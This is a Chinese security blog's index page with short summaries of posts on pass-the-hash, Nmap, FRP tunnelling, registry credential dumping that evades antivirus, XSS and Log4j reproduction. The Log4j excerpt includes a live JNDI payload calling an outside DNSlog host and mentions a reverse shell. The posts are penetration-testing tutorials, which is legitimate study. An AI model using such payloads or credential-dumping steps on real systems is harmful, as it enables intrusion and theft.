页首Html代码
摘要: 一、HASH传递基础 1.1 HASH传递攻击介绍 在域环境中,检测密码不是先解密HASH再验证密码是否正确的,而是通过验证HASH是否相同来进行验证的,也就是说我们可以通过获取HASH来伪造管理管员的账号密码登录,这就是HASH传递攻击,也叫PTH。 用户登录计算机时使用的大都是域账号,计算机在安 阅读全文
posted @ 2022-03-08 16:12 与或非丶 阅读(452) 评论(0) 推荐(0)
摘要: 1.1 Java程序的基本结构 Java程序的基本结构可以分为包、类、main()主方法、标识符、关键字、语句和注释等。 1.2 基本数据类型 Java有8种基本数据类型,其中的6种是数值行,另外两种分别是字符型和布尔类型,6种数值类型中有4种是整数类型,2种是浮点数类型。 1.2.1 整数类型 整 阅读全文
posted @ 2022-02-26 12:36 与或非丶 阅读(95) 评论(0) 推荐(0)
摘要: 信息收集简介 在渗透测试中,信息收集是我们非常重要的一个环节,信息收集的是否全面,直接决定了我们的渗透测试的成功与否。在军事里面俗称的知己知彼百战不殆,在安全领域中也同样的适用,所以我们要比目标客户更加了解客户单位的资产情况,才能使我们的渗透测试过程中找到更多的漏洞。 渗透测试思维导图 在渗透思维导 阅读全文
posted @ 2022-02-24 15:31 与或非丶 阅读(609) 评论(0) 推荐(0)
摘要: 一、Nmap基本介绍 1.1 Nmap介绍 Nmap是一种安全扫描器,主要用于探测计算机网络上得主机和服务,支持平台有Windows,Linux,MacOs等。 官网:http://nmap.org 参数说明:http://www.nmap.com.cn/doc/manual.shtml 1.2 N 阅读全文
posted @ 2022-02-24 15:29 与或非丶 阅读(200) 评论(0) 推荐(0)
摘要: 二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看,也可以使用burp自带的dnslog进行查看,我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显,说明存在该漏洞 2.2 反弹shel 阅读全文
posted @ 2021-12-31 10:57 与或非丶 阅读(860) 评论(0) 推荐(0)
摘要: 一、通过reg命令导出注册表 1.1为什么要通过reg命令导出 在我们渗透内网的时候,获取了WebShell和提权之后,接下来我们就要对密码进行窃取。如果我们直接添加账户或者是上传mimikatz上去的话,往往会触发杀毒软件的拦截和安全设备告警,很容易被管理员发现。那么我们就需要通过reg命令导出来 阅读全文
posted @ 2021-12-23 11:50 与或非丶 阅读(510) 评论(0) 推荐(0)
摘要: 一、FRP流量代理 1.1 FRP 介绍 frp是一个应用于内网穿透的反向代理工具,支持TCP\UDP\HTTP\HTTPS等协议.FRP使用的是go语言编写的,为实现我们从公网能访问到内网的服务器,WEB应用,SSH等。FRP使用的是socket代理,socket是加密通信的,类似于VPN,把公网 阅读全文
posted @ 2021-12-21 11:17 与或非丶 阅读(715) 评论(0) 推荐(0)
摘要: Python文件操作基本流程 用python如何操作一个文件呢,基本上可以分为三个步骤: 1、打开文件。 2、操作文件。 3、关闭文件。 #1、打开文件,得到文件句柄并赋值给一个变量。 f=open('./file.txt',mode='r',encoding='utf-8')2、通过句柄对文件进行 阅读全文
posted @ 2021-09-01 17:24 与或非丶 阅读(120) 评论(0) 推荐(0)
摘要: 一、反射型XSS漏洞挖掘 通过之前的基础,我们都知道了反射型XSS漏洞主要出现url中,那么它的输出点是在哪里呢?常见的输出场景如下: HTML标签之间,如:<div id="body">[输出]</div> HTML标签之内,如:<input type="text" vule="[输出]" /> 阅读全文
posted @ 2021-08-20 14:26 与或非丶 阅读(180) 评论(0) 推荐(0)
摘要: 一、什么是XSS漏洞 XSS即跨站脚本,由于Web应用程序对用户输入过滤的不足而造成的漏洞。攻击者可以利用网站的XSS漏洞,插入恶意的脚本代码到网页中,当其他的用户访问该网页时就会执行网页中的恶意代码,从而对该用户产生攻击和危害。 1.1 跨站脚本 跨站脚本的重点不在“跨”上,而是在“脚本”上,因为 阅读全文
posted @ 2021-08-20 10:42 与或非丶 阅读(103) 评论(0) 推荐(0)